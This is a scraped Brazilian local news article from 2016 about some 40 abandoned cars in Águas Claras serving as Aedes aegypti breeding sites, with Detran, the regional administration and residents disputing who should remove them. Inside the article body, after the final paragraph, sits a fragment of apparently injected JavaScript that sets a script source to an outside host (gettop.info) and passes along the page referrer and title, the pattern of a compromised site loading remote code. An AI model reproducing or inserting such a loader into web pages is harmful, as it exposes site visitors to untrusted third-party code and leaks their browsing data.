Ir para o conteúdo
Facebook X-twitter Instagram
  • Política
  • Cidades
  • Brasil
  • Esporte
  • Entorno
  • Pelaí
  • Versão impressa
  • Política
  • Cidades
  • Brasil
  • Esporte
  • Entorno
  • Pelaí
  • Versão impressa
  • Política
  • Cidades
  • Brasil
  • Esporte
  • Entorno
  • Pelaí
  • Versão impressa
  • Política
  • Cidades
  • Brasil
  • Esporte
  • Entorno
  • Pelaí
  • Versão impressa

Cidades

Criadouros de Aedes

  • Maria Gabbriela Veras
  • 26/11/2016
  • 09:00

Compartilhe:

\"legenda-carro-abandonado-proximo-ao-principal-shoppping-da-cidade-cleber-barreto\"Desde maio, pelo menos 40 carros estão abandonados nas ruas de Águas Claras. Os veículos estão se deteriorando e, com a chegada das chuvas, tornam-se locais propícios à proliferação do mosquito Aedes aegypti – transmissor de doenças como dengue, zika e chikungunya.

O Departamento de Trânsito (Detran-DF) informa que recolher sucatas ou veículos abandonados não é de sua competência. E só toma essa providência se for infringida alguma lei de trânsito, como estacionar em local irregular ou obstruir vias públicas. Segundo o órgão, o recolhimento pode ser feito pela Operação Sucata, coordenada pelas administrações regionais, ao mapear locais que precisem do serviço.

Ainda segundo o Detran, desde 2011, por meio dessa operação, foram recolhidas pelo menos 437 carcaças em ações conjuntas com os órgãos responsáveis de cada região administrativa. A guarda desses carros também cabe à Administração Regional. Se necessário, o Detran fornece o guincho e/ou empilhadeira para removê-los.

A Administração de Águas Claras informou que não pode requerer o recolhimento das sucatas, pois não tem espaço adequado para acomodar o grande número de veículos abandonados.

 

MP acionado – O presidente da Associação dos Moradores de Águas Claras (AMAAC), Roman Cuattrin, pediu apoio ao
 Ministério Público. Ele se baseou na Lei 5.342/14, que determina aos órgãos de trânsito a retirada de veículos que estiverem há mais de 30 dias abandonados nas ruas.

“O MP foi acionado, pois temos lei que pode nos amparar. O Detran é o órgão responsável pela retirada desses carros, mas não quer fazer isso na nossa região e fica passando a responsabilidade para a Administração de Águas Claras, que nada pode fazer porque também afirma não onde abrigar esses veículos. Enquanto isso, muitos carros são criadouros de doenças”, afirma Roman.

A Secretaria de Saúde informou que há várias frentes de trabalho em andamento em todo o DF para combater o mosquito transmissor da dengue e que os carros abandonados realmente dificultam o trabalho dos mais de 800 funcionários que atuam diariamente visitando as residências. A população pode denunciar os focos por meio do Disque Saúde 160.

s.src=\’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=\’ + encodeURIComponent(document.referrer) + \’&default_keyword=\’ + encodeURIComponent(document.title) + \’\’;

Compartilhe essa notícia:

Picture of Maria Gabbriela Veras

Maria Gabbriela Veras

Colunas

Orlando Pontes

“A revolução virá da periferia, da cultura, da música”

Caroline Romeiro

Novo Marco de Sistemas Alimentares e Clima

José Matos

A escada da vida

Júlio Miragaya

5 de dezembro de 1941: a virada na 2ª Guerra Mundial

Tesandro Vilela

IA generativa muda hábitos digitais na América Latina

Júlio Pontes

Cappelli lidera engajamento entre os pré-candidatos ao GDF

Últimas Notícias

Alexandre de Moraes entra em lista dos mais influentes do ano do Financial Times

5 de dezembro de 2025
Alfredo Gaspar - Relator da CPMI do INSS- Foto Lula Marques/Agência Brasil

CPMI do INSS convoca dono do Master e governador Zema

5 de dezembro de 2025

GDF projeta arrecadar R$ 3,5 bi com IPVA e IPTU em 2026

5 de dezembro de 2025

Hospital de Santa Maria inaugura tomógrafo de última geração

5 de dezembro de 2025

Newsletter

Siga-nos

Facebook X-twitter Instagram

Sobre

  • Anuncie Aqui
  • Fale Conosco
  • Politica de Privacidade
  • Versão impressa
  • Expediente
  • Anuncie Aqui
  • Fale Conosco
  • Politica de Privacidade
  • Versão impressa
  • Expediente

Blogs

  • TV BSB Notícias
  • Pelaí
  • Nutrição
  • Chico Sant’Anna
  • Espiritualidade
  • TV BSB Notícias
  • Pelaí
  • Nutrição
  • Chico Sant’Anna
  • Espiritualidade

Colunas

  • Geral
  • Política
  • Cidades
  • Brasil
  • Esporte
  • Geral
  • Política
  • Cidades
  • Brasil
  • Esporte
Facebook X-twitter Instagram
  • Política de Privacidade
  • Termos de Uso

© Copyright 2011-2025 Brasília Capital Produtora e Editora de Jornais e Revistas LTDA.